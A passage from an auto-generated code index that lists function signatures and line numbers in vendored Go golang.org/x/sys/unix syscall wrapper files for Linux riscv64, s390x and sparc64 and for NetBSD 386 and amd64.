sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function mmap (line 595) | func mmap(addr uintptr, length uintptr, prot int, flags int, fd int, off... function futimesat (line 606) | func futimesat(dirfd int, path string, times *[2]Timeval) (err error) { function Gettimeofday (line 621) | func Gettimeofday(tv *Timeval) (err error) { function Time (line 631) | func Time(t *Time_t) (tt Time_t, err error) { function Utime (line 642) | func Utime(path string, buf *Utimbuf) (err error) { function utimes (line 657) | func utimes(path string, times *[2]Timeval) (err error) { function syncFileRange2 (line 672) | func syncFileRange2(fd int, flags int, off int64, n int64) (err error) { function kexecFileLoad (line 682) | func kexecFileLoad(kernelFd int, initrdFd int, cmdlineLen int, cmdline s... function Alarm (line 697) | func Alarm(seconds uint) (remaining uint, err error) { FILE: vendor/golang.org/x/sys/unix/zsyscall_linux_riscv64.go function fanotifyMark (line 17) | func fanotifyMark(fd int, flags uint, mask uint64, dirFd int, pathname *... function Fallocate (line 27) | func Fallocate(fd int, mode uint32, off int64, len int64) (err error) { function Tee (line 37) | func Tee(rfd int, wfd int, len int, flags int) (n int64, err error) { function EpollWait (line 48) | func EpollWait(epfd int, events []EpollEvent, msec int) (n int, err erro... function Fadvise (line 65) | func Fadvise(fd int, offset int64, length int64, advice int) (err error) { function Fchown (line 75) | func Fchown(fd int, uid int, gid int) (err error) { function Fstat (line 85) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 95) | func Fstatat(fd int, path string, stat *Stat_t, flags int) (err error) { function Fstatfs (line 110) | func Fstatfs(fd int, buf *Statfs_t) (err error) { function Ftruncate (line 120) | func Ftruncate(fd int, length int64) (err error) { function Getegid (line 130) | func Getegid() (egid int) { function Geteuid (line 138) | func Geteuid() (euid int) { function Getgid (line 146) | func Getgid() (gid int) { function Getrlimit (line 154) | func Getrlimit(resource int, rlim *Rlimit) (err error) { function Getuid (line 164) | func Getuid() (uid int) { function Listen (line 172) | func Listen(s int, n int) (err error) { function MemfdSecret (line 182) | func MemfdSecret(flags int) (fd int, err error) { function pread (line 193) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 210) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function Seek (line 227) | func Seek(fd int, offset int64, whence int) (off int64, err error) { function sendfile (line 238) | func sendfile(outfd int, infd int, offset *int64, count int) (written in... function setfsgid (line 249) | func setfsgid(gid int) (prev int, err error) { function setfsuid (line 260) | func setfsuid(uid int) (prev int, err error) { function Shutdown (line 271) | func Shutdown(fd int, how int) (err error) { function Splice (line 281) | func Splice(rfd int, roff *int64, wfd int, woff *int64, len int, flags i... function Statfs (line 292) | func Statfs(path string, buf *Statfs_t) (err error) { function SyncFileRange (line 307) | func SyncFileRange(fd int, off int64, n int64, flags int) (err error) { function Truncate (line 317) | func Truncate(path string, length int64) (err error) { function accept4 (line 332) | func accept4(s int, rsa *RawSockaddrAny, addrlen *_Socklen, flags int) (... function bind (line 343) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 353) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function getgroups (line 363) | func getgroups(n int, list *_Gid_t) (nn int, err error) { function setgroups (line 374) | func setgroups(n int, list *_Gid_t) (err error) { function getsockopt (line 384) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 394) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function socket (line 404) | func socket(domain int, typ int, proto int) (fd int, err error) { function socketpair (line 415) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function getpeername (line 425) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 435) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function recvfrom (line 445) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 462) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 478) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 489) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function mmap (line 500) | func mmap(addr uintptr, length uintptr, prot int, flags int, fd int, off... function Gettimeofday (line 511) | func Gettimeofday(tv *Timeval) (err error) { function kexecFileLoad (line 521) | func kexecFileLoad(kernelFd int, initrdFd int, cmdlineLen int, cmdline s... function riscvHWProbe (line 536) | func riscvHWProbe(pairs []RISCVHWProbePairs, cpuCount uintptr, cpus *CPU... FILE: vendor/golang.org/x/sys/unix/zsyscall_linux_s390x.go function fanotifyMark (line 17) | func fanotifyMark(fd int, flags uint, mask uint64, dirFd int, pathname *... function Fallocate (line 27) | func Fallocate(fd int, mode uint32, off int64, len int64) (err error) { function Tee (line 37) | func Tee(rfd int, wfd int, len int, flags int) (n int64, err error) { function EpollWait (line 48) | func EpollWait(epfd int, events []EpollEvent, msec int) (n int, err erro... function Fadvise (line 65) | func Fadvise(fd int, offset int64, length int64, advice int) (err error) { function Fchown (line 75) | func Fchown(fd int, uid int, gid int) (err error) { function Fstat (line 85) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 95) | func Fstatat(dirfd int, path string, stat *Stat_t, flags int) (err error) { function Fstatfs (line 110) | func Fstatfs(fd int, buf *Statfs_t) (err error) { function Ftruncate (line 120) | func Ftruncate(fd int, length int64) (err error) { function Getegid (line 130) | func Getegid() (egid int) { function Geteuid (line 138) | func Geteuid() (euid int) { function Getgid (line 146) | func Getgid() (gid int) { function Getrlimit (line 154) | func Getrlimit(resource int, rlim *Rlimit) (err error) { function Getuid (line 164) | func Getuid() (uid int) { function Lchown (line 172) | func Lchown(path string, uid int, gid int) (err error) { function Lstat (line 187) | func Lstat(path string, stat *Stat_t) (err error) { function Pause (line 202) | func Pause() (err error) { function pread (line 212) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 229) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function Renameat (line 246) | func Renameat(olddirfd int, oldpath string, newdirfd int, newpath string... function Seek (line 266) | func Seek(fd int, offset int64, whence int) (off int64, err error) { function Select (line 277) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function sendfile (line 288) | func sendfile(outfd int, infd int, offset *int64, count int) (written in... function setfsgid (line 299) | func setfsgid(gid int) (prev int, err error) { function setfsuid (line 310) | func setfsuid(uid int) (prev int, err error) { function Splice (line 321) | func Splice(rfd int, roff *int64, wfd int, woff *int64, len int, flags i... function Stat (line 332) | func Stat(path string, stat *Stat_t) (err error) { function Statfs (line 347) | func Statfs(path string, buf *Statfs_t) (err error) { function SyncFileRange (line 362) | func SyncFileRange(fd int, off int64, n int64, flags int) (err error) { function Truncate (line 372) | func Truncate(path string, length int64) (err error) { function Ustat (line 387) | func Ustat(dev int, ubuf *Ustat_t) (err error) { function getgroups (line 397) | func getgroups(n int, list *_Gid_t) (nn int, err error) { function setgroups (line 408) | func setgroups(n int, list *_Gid_t) (err error) { function futimesat (line 418) | func futimesat(dirfd int, path string, times *[2]Timeval) (err error) { function Gettimeofday (line 433) | func Gettimeofday(tv *Timeval) (err error) { function Utime (line 443) | func Utime(path string, buf *Utimbuf) (err error) { function utimes (line 458) | func utimes(path string, times *[2]Timeval) (err error) { function kexecFileLoad (line 473) | func kexecFileLoad(kernelFd int, initrdFd int, cmdlineLen int, cmdline s... function Alarm (line 488) | func Alarm(seconds uint) (remaining uint, err error) { FILE: vendor/golang.org/x/sys/unix/zsyscall_linux_sparc64.go function fanotifyMark (line 17) | func fanotifyMark(fd int, flags uint, mask uint64, dirFd int, pathname *... function Fallocate (line 27) | func Fallocate(fd int, mode uint32, off int64, len int64) (err error) { function Tee (line 37) | func Tee(rfd int, wfd int, len int, flags int) (n int64, err error) { function EpollWait (line 48) | func EpollWait(epfd int, events []EpollEvent, msec int) (n int, err erro... function Fadvise (line 65) | func Fadvise(fd int, offset int64, length int64, advice int) (err error) { function Fchown (line 75) | func Fchown(fd int, uid int, gid int) (err error) { function Fstat (line 85) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 95) | func Fstatat(dirfd int, path string, stat *Stat_t, flags int) (err error) { function Fstatfs (line 110) | func Fstatfs(fd int, buf *Statfs_t) (err error) { function Ftruncate (line 120) | func Ftruncate(fd int, length int64) (err error) { function Getegid (line 130) | func Getegid() (egid int) { function Geteuid (line 138) | func Geteuid() (euid int) { function Getgid (line 146) | func Getgid() (gid int) { function Getrlimit (line 154) | func Getrlimit(resource int, rlim *Rlimit) (err error) { function Getuid (line 164) | func Getuid() (uid int) { function Lchown (line 172) | func Lchown(path string, uid int, gid int) (err error) { function Listen (line 187) | func Listen(s int, n int) (err error) { function Lstat (line 197) | func Lstat(path string, stat *Stat_t) (err error) { function Pause (line 212) | func Pause() (err error) { function pread (line 222) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 239) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function Renameat (line 256) | func Renameat(olddirfd int, oldpath string, newdirfd int, newpath string... function Seek (line 276) | func Seek(fd int, offset int64, whence int) (off int64, err error) { function Select (line 287) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function sendfile (line 298) | func sendfile(outfd int, infd int, offset *int64, count int) (written in... function setfsgid (line 309) | func setfsgid(gid int) (prev int, err error) { function setfsuid (line 320) | func setfsuid(uid int) (prev int, err error) { function Shutdown (line 331) | func Shutdown(fd int, how int) (err error) { function Splice (line 341) | func Splice(rfd int, roff *int64, wfd int, woff *int64, len int, flags i... function Stat (line 352) | func Stat(path string, stat *Stat_t) (err error) { function Statfs (line 367) | func Statfs(path string, buf *Statfs_t) (err error) { function SyncFileRange (line 382) | func SyncFileRange(fd int, off int64, n int64, flags int) (err error) { function Truncate (line 392) | func Truncate(path string, length int64) (err error) { function accept4 (line 407) | func accept4(s int, rsa *RawSockaddrAny, addrlen *_Socklen, flags int) (... function bind (line 418) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 428) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function getgroups (line 438) | func getgroups(n int, list *_Gid_t) (nn int, err error) { function setgroups (line 449) | func setgroups(n int, list *_Gid_t) (err error) { function getsockopt (line 459) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 469) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function socket (line 479) | func socket(domain int, typ int, proto int) (fd int, err error) { function socketpair (line 490) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function getpeername (line 500) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 510) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function recvfrom (line 520) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 537) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 553) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 564) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function mmap (line 575) | func mmap(addr uintptr, length uintptr, prot int, flags int, fd int, off... function futimesat (line 586) | func futimesat(dirfd int, path string, times *[2]Timeval) (err error) { function Gettimeofday (line 601) | func Gettimeofday(tv *Timeval) (err error) { function Utime (line 611) | func Utime(path string, buf *Utimbuf) (err error) { function utimes (line 626) | func utimes(path string, times *[2]Timeval) (err error) { function Alarm (line 641) | func Alarm(seconds uint) (remaining uint, err error) { FILE: vendor/golang.org/x/sys/unix/zsyscall_netbsd_386.go function getgroups (line 17) | func getgroups(ngid int, gid *_Gid_t) (n int, err error) { function setgroups (line 28) | func setgroups(ngid int, gid *_Gid_t) (err error) { function wait4 (line 38) | func wait4(pid int, wstatus *_C_int, options int, rusage *Rusage) (wpid ... function accept (line 49) | func accept(s int, rsa *RawSockaddrAny, addrlen *_Socklen) (fd int, err ... function bind (line 60) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 70) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function socket (line 80) | func socket(domain int, typ int, proto int) (fd int, err error) { function getsockopt (line 91) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 101) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function getpeername (line 111) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 121) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function Shutdown (line 131) | func Shutdown(s int, how int) (err error) { function socketpair (line 141) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function recvfrom (line 151) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 168) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 184) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 195) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function kevent (line 206) | func kevent(kq int, change unsafe.Pointer, nchange int, event unsafe.Poi... function utimes (line 217) | func utimes(path string, timeval *[2]Timeval) (err error) { function futimes (line 232) | func futimes(fd int, timeval *[2]Timeval) (err error) { function poll (line 242) | func poll(fds *PollFd, nfds int, timeout int) (n int, err error) { function Madvise (line 253) | func Madvise(b []byte, behav int) (err error) { function Mlock (line 269) | func Mlock(b []byte) (err error) { function Mlockall (line 285) | func Mlockall(flags int) (err error) { function Mprotect (line 295) | func Mprotect(b []byte, prot int) (err error) { function Msync (line 311) | func Msync(b []byte, flags int) (err error) { function Munlock (line 327) | func Munlock(b []byte) (err error) { function Munlockall (line 343) | func Munlockall() (err error) { function pipe2 (line 353) | func pipe2(p *[2]_C_int, flags int) (err error) { function Getdents (line 363) | func Getdents(fd int, buf []byte) (n int, err error) { function Getcwd (line 380) | func Getcwd(buf []byte) (n int, err error) { function ioctl (line 397) | func ioctl(fd int, req uint, arg uintptr) (err error) { function ioctlPtr (line 407) | func ioctlPtr(fd int, req uint, arg unsafe.Pointer) (err error) { function sysctl (line 417) | func sysctl(mib []_C_int, old *byte, oldlen *uintptr, new *byte, newlen ... function Access (line 433) | func Access(path string, mode uint32) (err error) { function Adjtime (line 448) | func Adjtime(delta *Timeval, olddelta *Timeval) (err error) { function Chdir (line 458) | func Chdir(path string) (err error) { function Chflags (line 473) | func Chflags(path string, flags int) (err error) { function Chmod (line 488) | func Chmod(path string, mode uint32) (err error) { function Chown (line 503) | func Chown(path string, uid int, gid int) (err error) { function Chroot (line 518) | func Chroot(path string) (err error) { function ClockGettime (line 533) | func ClockGettime(clockid int32, time *Timespec) (err error) { function Close (line 543) | func Close(fd int) (err error) { function Dup (line 553) | func Dup(fd int) (nfd int, err error) { function Dup2 (line 564) | func Dup2(from int, to int) (err error) { function Dup3 (line 574) | func Dup3(from int, to int, flags int) (err error) { function Exit (line 584) | func Exit(code int) { function ExtattrGetFd (line 591) | func ExtattrGetFd(fd int, attrnamespace int, attrname string, data uintp... function ExtattrSetFd (line 607) | func ExtattrSetFd(fd int, attrnamespace int, attrname string, data uintp... function ExtattrDeleteFd (line 623) | func ExtattrDeleteFd(fd int, attrnamespace int, attrname string) (err er... function ExtattrListFd (line 638) | func ExtattrListFd(fd int, attrnamespace int, data uintptr, nbytes int) ... function ExtattrGetFile (line 649) | func ExtattrGetFile(file string, attrnamespace int, attrname string, dat... function ExtattrSetFile (line 670) | func ExtattrSetFile(file string, attrnamespace int, attrname string, dat... function ExtattrDeleteFile (line 691) | func ExtattrDeleteFile(file string, attrnamespace int, attrname string) ... function ExtattrListFile (line 711) | func ExtattrListFile(file string, attrnamespace int, data uintptr, nbyte... function ExtattrGetLink (line 727) | func ExtattrGetLink(link string, attrnamespace int, attrname string, dat... function ExtattrSetLink (line 748) | func ExtattrSetLink(link string, attrnamespace int, attrname string, dat... function ExtattrDeleteLink (line 769) | func ExtattrDeleteLink(link string, attrnamespace int, attrname string) ... function ExtattrListLink (line 789) | func ExtattrListLink(link string, attrnamespace int, data uintptr, nbyte... function Faccessat (line 805) | func Faccessat(dirfd int, path string, mode uint32, flags int) (err erro... function Fadvise (line 820) | func Fadvise(fd int, offset int64, length int64, advice int) (err error) { function Fchdir (line 830) | func Fchdir(fd int) (err error) { function Fchflags (line 840) | func Fchflags(fd int, flags int) (err error) { function Fchmod (line 850) | func Fchmod(fd int, mode uint32) (err error) { function Fchmodat (line 860) | func Fchmodat(dirfd int, path string, mode uint32, flags int) (err error) { function Fchown (line 875) | func Fchown(fd int, uid int, gid int) (err error) { function Fchownat (line 885) | func Fchownat(dirfd int, path string, uid int, gid int, flags int) (err ... function Flock (line 900) | func Flock(fd int, how int) (err error) { function Fpathconf (line 910) | func Fpathconf(fd int, name int) (val int, err error) { function Fstat (line 921) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 931) | func Fstatat(fd int, path string, stat *Stat_t, flags int) (err error) { function Fstatvfs1 (line 946) | func Fstatvfs1(fd int, buf *Statvfs_t, flags int) (err error) { function Fsync (line 956) | func Fsync(fd int) (err error) { function Ftruncate (line 966) | func Ftruncate(fd int, length int64) (err error) { function Getegid (line 976) | func Getegid() (egid int) { function Geteuid (line 984) | func Geteuid() (uid int) { function Getgid (line 992) | func Getgid() (gid int) { function Getpgid (line 1000) | func Getpgid(pid int) (pgid int, err error) { function Getpgrp (line 1011) | func Getpgrp() (pgrp int) { function Getpid (line 1019) | func Getpid() (pid int) { function Getppid (line 1027) | func Getppid() (ppid int) { function Getpriority (line 1035) | func Getpriority(which int, who int) (prio int, err error) { function Getrlimit (line 1046) | func Getrlimit(which int, lim *Rlimit) (err error) { function Getrusage (line 1056) | func Getrusage(who int, rusage *Rusage) (err error) { function Getsid (line 1066) | func Getsid(pid int) (sid int, err error) { function Gettimeofday (line 1077) | func Gettimeofday(tv *Timeval) (err error) { function Getuid (line 1087) | func Getuid() (uid int) { function Issetugid (line 1095) | func Issetugid() (tainted bool) { function Kill (line 1103) | func Kill(pid int, signum syscall.Signal) (err error) { function Kqueue (line 1113) | func Kqueue() (fd int, err error) { function Lchown (line 1124) | func Lchown(path string, uid int, gid int) (err error) { function Link (line 1139) | func Link(path string, link string) (err error) { function Linkat (line 1159) | func Linkat(pathfd int, path string, linkfd int, link string, flags int)... function Listen (line 1179) | func Listen(s int, backlog int) (err error) { function Lstat (line 1189) | func Lstat(path string, stat *Stat_t) (err error) { function Mkdir (line 1204) | func Mkdir(path string, mode uint32) (err error) { function Mkdirat (line 1219) | func Mkdirat(dirfd int, path string, mode uint32) (err error) { function Mkfifo (line 1234) | func Mkfifo(path string, mode uint32) (err error) { function Mkfifoat (line 1249) | func Mkfifoat(dirfd int, path string, mode uint32) (err error) { function Mknod (line 1264) | func Mknod(path string, mode uint32, dev int) (err error) { function Mknodat (line 1279) | func Mknodat(dirfd int, path string, mode uint32, dev int) (err error) { function Nanosleep (line 1294) | func Nanosleep(time *Timespec, leftover *Timespec) (err error) { function Open (line 1304) | func Open(path string, mode int, perm uint32) (fd int, err error) { function Openat (line 1320) | func Openat(dirfd int, path string, mode int, perm uint32) (fd int, err ... function Pathconf (line 1336) | func Pathconf(path string, name int) (val int, err error) { function pread (line 1352) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 1369) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function read (line 1386) | func read(fd int, p []byte) (n int, err error) { function Readlink (line 1403) | func Readlink(path string, buf []byte) (n int, err error) { function Readlinkat (line 1425) | func Readlinkat(dirfd int, path string, buf []byte) (n int, err error) { function Rename (line 1447) | func Rename(from string, to string) (err error) { function Renameat (line 1467) | func Renameat(fromfd int, from string, tofd int, to string) (err error) { function Revoke (line 1487) | func Revoke(path string) (err error) { function Rmdir (line 1502) | func Rmdir(path string) (err error) { function Seek (line 1517) | func Seek(fd int, offset int64, whence int) (newoffset int64, err error) { function Select (line 1528) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function Setegid (line 1539) | func Setegid(egid int) (err error) { function Seteuid (line 1549) | func Seteuid(euid int) (err error) { function Setgid (line 1559) | func Setgid(gid int) (err error) { function Setpgid (line 1569) | func Setpgid(pid int, pgid int) (err error) { function Setpriority (line 1579) | func Setpriority(which int, who int, prio int) (err error) { function Setregid (line 1589) | func Setregid(rgid int, egid int) (err error) { function Setreuid (line 1599) | func Setreuid(ruid int, euid int) (err error) { function Setsid (line 1609) | func Setsid() (pid int, err error) { function Settimeofday (line 1620) | func Settimeofday(tp *Timeval) (err error) { function Setuid (line 1630) | func Setuid(uid int) (err error) { function Stat (line 1640) | func Stat(path string, stat *Stat_t) (err error) { function Statvfs1 (line 1655) | func Statvfs1(path string, buf *Statvfs_t, flags int) (err error) { function Symlink (line 1670) | func Symlink(path string, link string) (err error) { function Symlinkat (line 1690) | func Symlinkat(oldpath string, newdirfd int, newpath string) (err error) { function Sync (line 1710) | func Sync() (err error) { function Truncate (line 1720) | func Truncate(path string, length int64) (err error) { function Umask (line 1735) | func Umask(newmask int) (oldmask int) { function Unlink (line 1743) | func Unlink(path string) (err error) { function Unlinkat (line 1758) | func Unlinkat(dirfd int, path string, flags int) (err error) { function Unmount (line 1773) | func Unmount(path string, flags int) (err error) { function write (line 1788) | func write(fd int, p []byte) (n int, err error) { function mmap (line 1805) | func mmap(addr uintptr, length uintptr, prot int, flag int, fd int, pos ... function munmap (line 1816) | func munmap(addr uintptr, length uintptr) (err error) { function utimensat (line 1826) | func utimensat(dirfd int, path string, times *[2]Timespec, flags int) (e... function mremapNetBSD (line 1841) | func mremapNetBSD(oldp uintptr, oldsize uintptr, newp uintptr, newsize u... FILE: vendor/golang.org/x/sys/unix/zsyscall_netbsd_amd64.go function getgroups (line 17) | func getgroups(ngid int, gid *_Gid_t) (n int, err error) { function setgroups (line 28) | func setgroups(ngid int, gid *_Gid_t) (err error) { function wait4 (line 38) | func wait4(pid int, wstatus *_C_int, options int, rusage *Rusage) (wpid ... function accept (line 49) | func accept(s int, rsa *RawSockaddrAny, addrlen *_Socklen) (fd int, err ... function bind (line 60) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 70) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function socket (line 80) | func socket(domain int, typ int, proto int) (fd int, err error) { function getsockopt (line 91) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 101) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function getpeername (line 111) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 121) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function Shutdown (line 131) | func Shutdown(s int, how int) (err error) { function socketpair (line 141) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function recvfrom (line 151) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 168) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 184) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 195) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function kevent (line 206) | func kevent(kq int, change unsafe.Pointer, nchange int, event unsafe.Poi... function utimes (line 217) | func utimes(path string, timeval *[2]Timeval) (err error) { function futimes (line 232) | func futimes(fd int, timeval *[2]Timeval) (err error) { function poll (line 242) | func poll(fds *PollFd, nfds int, timeout int) (n int, err error) { function Madvise (line 253) | func Madvise(b []byte, behav int) (err error) { function Mlock (line 269) | func Mlock(b []byte) (err error) { function Mlockall (line 285) | func Mlockall(flags int) (err error) { function Mprotect (line 295) | func Mprotect(b []byte, prot int) (err error) { function Msync (line 311) | func Msync(b []byte, flags int) (err error) { function Munlock (line 327) | func Munlock(b []byte) (err error) { function Munlockall (line 343) | func Munlockall() (err error) { function pipe2 (line 353) | func pipe2(p *[2]_C_int, flags int) (err error) { function Getdents (line 363) | func Getdents(fd int, buf []byte) (n int, err error) { function Getcwd (line 380) | func Getcwd(buf []byte) (n int, err error) { function ioctl (line 397) | func ioctl(fd int, req uint, arg uintptr) (err error) { function ioctlPtr (line 407) | func ioctlPtr(fd int, req uint, arg unsafe.Pointer) (err error) { function sysctl (line 417) | func sysctl(mib []_C_int, old *byte, oldlen *uintptr, new *byte, newlen ... function Access (line 433) | func Access(path string, mode uint32) (err error) { function Adjtime (line 448) | func Adjtime(delta *Timeval, olddelta *Timeval) (err error) { function Chdir (line 458) | func Chdir(path string) (err error) { function Chflags (line 473) | func Chflags(path string, flags int) (err error) { function Chmod (line 488) | func Chmod(path string, mode uint32) (err error) { function Chown (line 503) | func Chown(path string, uid int, gid int) (err error) { function Chroot (line 518) | func Chroot(path string) (err error) { function ClockGettime (line 533) | func ClockGettime(clockid int32, time *Timespec) (err error) { function Close (line 543) | func Close(fd int) (err error) { function Dup (line 553) | func Dup(fd int) (nfd int, err error) { function Dup2 (line 564) | func Dup2(from int, to int) (err error) { function Dup3 (line 574) | func Dup3(from int, to int, flags int) (err error) { function Exit (line 584) | func Exit(code int) { function ExtattrGetFd (line 591) | func ExtattrGetFd(fd int, attrnamespace int, attrname string, data uintp... function ExtattrSetFd (line 607) | func ExtattrSetFd(fd int, attrnamespace int, attrname string, data uintp... function ExtattrDeleteFd (line 623) | func ExtattrDeleteFd(fd int, attrnamespace int, attrname string) (err er... function ExtattrListFd (line 638) | func ExtattrListFd(fd int, attrnamespace int, data uintptr, nbytes int) ... function ExtattrGetFile (line 649) | func ExtattrGetFile(file string, attrnamespace int, attrname string, dat... function ExtattrSetFile (line 670) | func ExtattrSetFile(file string, attrnamespace int, attrname string, dat... function ExtattrDeleteFile (line 691) | func ExtattrDeleteFile(file string, attrnamespace int, attrname string) ... function ExtattrListFile (line 711) | func ExtattrListFile(file string, attrnamespace int, data uintptr, nbyte... function ExtattrGetLink (line 727) | func ExtattrGetLink(link string, attrnamespace int, attrname string, dat... function ExtattrSetLink (line 748) | func ExtattrSetLink(link string, attrnamespace int, attrname string, dat... function ExtattrDeleteLink (line 769) | func ExtattrDeleteLink(link string, attrnamespace int, attrname string) ... function ExtattrListLink (line 789) | func ExtattrListLink(link string, attrnamespace int, data uintptr, nbyte... function Faccessat (line 805) | func Faccessat(dirfd int, path string, mode uint32, flags int) (err erro... function Fadvise (line 820) | func Fadvise(fd int, offset int64, length int64, advice int) (err error) { function Fchdir (line 830) | func Fchdir(fd int) (err error) { function Fchflags (line 840) | func Fchflags(fd int, flags int) (err error) { function Fchmod (line 850) | func Fchmod(fd int, mode uint32) (err error) { function Fchmodat (line 860) | func Fchmodat(dirfd int, path string, mode uint32, flags int) (err error) { function Fchown (line 875) | func Fchown(fd int, uid int, gid int) (err error) { function Fchownat (line 885) | func Fchownat(dirfd int, path string, uid int, gid int, flags int) (err ... function Flock (line 900) | func Flock(fd int, how int) (err error) { function Fpathconf (line 910) | func Fpathconf(fd int, name int) (val int, err error) { function Fstat (line 921) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 931) | func Fstatat(fd int, path string, stat *Stat_t, flags int) (err error) { function Fstatvfs1 (line 946) | func Fstatvfs1(fd int, buf *Statvfs_t, flags int) (err error) { function Fsync (line 956) | func Fsync(fd int) (err error) { function Ftruncate (line 966) | func Ftruncate(fd int, length int64) (err error) { function Getegid (line 976) | func Getegid() (egid int) { function Geteuid (line 984) | func Geteuid() (uid int) { function Getgid (line 992) | func Getgid() (gid int) { function Getpgid (line 1000) | func Getpgid(pid int) (pgid int, err error) { function Getpgrp (line 1011) | func Getpgrp() (pgrp int) { function Getpid (line 1019) | func Getpid() (pid int) { function Getppid (line 1027) | func Getppid() (ppid int) { function Getpriority (line 1035) | func Getpriority(which int, who int) (prio int, err error) { function Getrlimit (line 1046) | func Getrlimit(which int, lim *Rlimit) (err error) { function Getrusage (line 1056) | func Getrusage(who int, rusage *Rusage) (err error) { function Getsid (line 1066) | func Getsid(pid int) (sid int, err error) { function Gettimeofday (line 1077) | func Gettimeofday(tv *Timeval) (err error) { function Getuid (line 1087) | func Getuid() (uid int) { function Issetugid (line 1095) | func Issetugid() (tainted bool) { function Kill (line 1103) | func Kill(pid int, signum syscall.Signal) (err error) { function Kqueue (line 1113) | func Kqueue() (fd int, err error) { function Lchown (line 1124) | func Lchown(path string, uid int, gid int) (err error) { function Link (line 1139) | func Link(path string, link string) (err error) { function Linkat (line 1159) | func Linkat(pathfd int, path string, linkfd int, link string, flags int)... function Listen (line 1179) | func Listen(s int, backlog int) (err error) { function Lstat (line 1189) | func Lstat(path string, stat *Stat_t) (err error) { function Mkdir (line 1204) | func Mkdir(path string, mode uint32) (err error) { function Mkdirat (line 1219) | func Mkdirat(dirfd int, path string, mode uint32) (err error) { function Mkfifo (line 1234) | func Mkfifo(path string, mode uint32) (err error) { function Mkfifoat (line 1249) | func Mkfifoat(dirfd int, path string, mode uint32) (err error) { function Mknod (line 1264) | func Mknod(path string, mode uint32, dev int) (err error) { function Mknodat (line 1279) | func Mknodat(dirfd int, path string, mode uint32, dev int) (err error) { function Nanosleep (line 1294) | func Nanosleep(time *Timespec, leftover *Timespec) (err error) { function Open (line 1304) | func Open(path string, mode int, perm uint32) (fd int, err error) { function Openat (line 1320) | func Openat(dirfd int, path string, mode int, perm uint32) (fd int, err ... function Pathconf (line 1336) | func Pathconf(path string, name int) (val int, err error) { function pread (line 1352) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 1369) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function read (line 1386) | func read(fd 